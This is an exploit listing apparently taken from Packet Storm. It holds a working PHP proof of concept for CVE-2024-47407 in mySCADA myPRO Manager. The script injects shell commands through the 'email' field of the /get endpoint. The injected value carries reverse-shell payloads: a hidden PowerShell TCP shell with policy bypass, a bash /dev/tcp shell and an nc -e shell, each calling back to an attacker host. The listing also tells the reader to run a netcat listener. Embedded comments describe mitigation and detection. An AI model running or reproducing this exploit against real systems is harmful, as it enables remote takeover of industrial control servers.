## https://sploitus.com/exploit?id=PACKETSTORM:214964
=============================================================================================================================================
    | # Title     : MySCADA MyPRO Manager 1.2 PHP Code Injection Vulnerability                                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.myscada.org/mypro/                                                                                              |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking in Google or another search engine.
    
    [+] Code Description:
        
    	PHP Code Injection Vulnerability in mySCADA myPRO Manager versions up to v1.2, aka CVE-2024-47407.
    	
    	Send an HTTP POST request to /get with the email data containing the command to be executed. 
    	
    	Check if the response is 200, meaning the command was executed successfully.
    	
    	Before running the code, open a Netcat window on your attacking machine and listen for connections on the specified port: nc -lvnp ATTACKER_PORT
    	
    	(Related: https://packetstorm.news/files/id/189175/ — related CVE: CVE-2024-47407).
    	
    [+] save code as poc.php .
    
    [+] Set Target : line 4 + 5 + 6
    
    [+] Usage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    // by indoushka
    // Exploit PoC for CVE-2024-47407 in mySCADA myPRO Manager: obtains a reverse shell on
    // different operating systems by injecting into the "email" field of the /get endpoint.
    // Reviewer note: despite the "PHP code injection" title, the separators used below
    // (&&, ;, trailing #) are shell metacharacters, so the flaw behaves as OS command
    // injection — the email value presumably reaches a shell unvalidated (not visible here).
    // Vendor-side mitigation is to validate the address and never pass it to a shell.
    // Network-side detection can key on a JSON POST to /get (port 34022 in this PoC) whose
    // "email" contains shell metacharacters or a hidden, policy-bypassing PowerShell command.
    
    $target = "http://target-ip:34022/get"; // replace with the victim's IP
    $attacker_ip = "ATTACKER_IP"; // replace with the attacker's IP
    $attacker_port = "ATTACKER_PORT"; // replace with the port you will listen on
    
    // Detect the operating system and run the matching payload.
    // Each payload is a reverse-shell one-liner. The Windows variant spawns a hidden
    // PowerShell process with execution policy bypass (-NoP -NonI -W Hidden -Exec Bypass),
    // a command-line pattern that EDR/SIEM rules commonly flag on its own.
    $windows_payload = "powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"\$client = New-Object System.Net.Sockets.TCPClient('$attacker_ip',$attacker_port); \$stream = \$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i); \$sendback = (iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '; \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); \$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()}; \$client.Close()\"";
    
    $linux_payload = "/bin/bash -c 'bash -i >& /dev/tcp/$attacker_ip/$attacker_port 0>&1'";
    
    $mac_payload = "osascript -e 'do shell script \"nc -e /bin/bash $attacker_ip $attacker_port\"'";
    
    // Build the email value that carries the command injection: a syntactically plausible
    // address followed by "&&", so the text after it is executed as a separate command.
    // The per-OS checks are chained with ";" and the trailing "#" comments out whatever
    // the server appends after the injected value.
    $email_injection = rand(100, 999) . "@" . rand(1000, 9999) . ".com&&";
    
    $email_injection .= "if exist C:\\Windows\\System32\\ cmd /c \"$windows_payload\"";
    $email_injection .= "; if [ -f /bin/bash ]; then $linux_payload; fi";
    $email_injection .= "; if [ -f /usr/bin/osascript ]; then $mac_payload; fi";
    $email_injection .= " #";
    
    // Prepare the request body: the "testEmail" command is the code path that consumes
    // the "email" value.
    $data = json_encode([
        "command" => "testEmail",
        "email" => $email_injection
    ]);
    
    // Send the request.
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    // Check whether the exploit succeeded.
    // Caveat: an HTTP 200 only means the server accepted the request; it does not prove that
    // the injected command ran or that a shell connected back. The return value of curl_exec()
    // is not checked, so on a transport error $http_code is 0 and the failure message below
    // is printed for plain network problems as well as for a hardened host.
    if ($http_code == 200) {
        echo "[+] تم إرسال حمولة Shell Reverse بنجاح! انتظر الاتصال على المنفذ $attacker_port\n";
    } else {
        echo "[-] فشل التنفيذ، ربما النظام محمي.\n";
    }
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================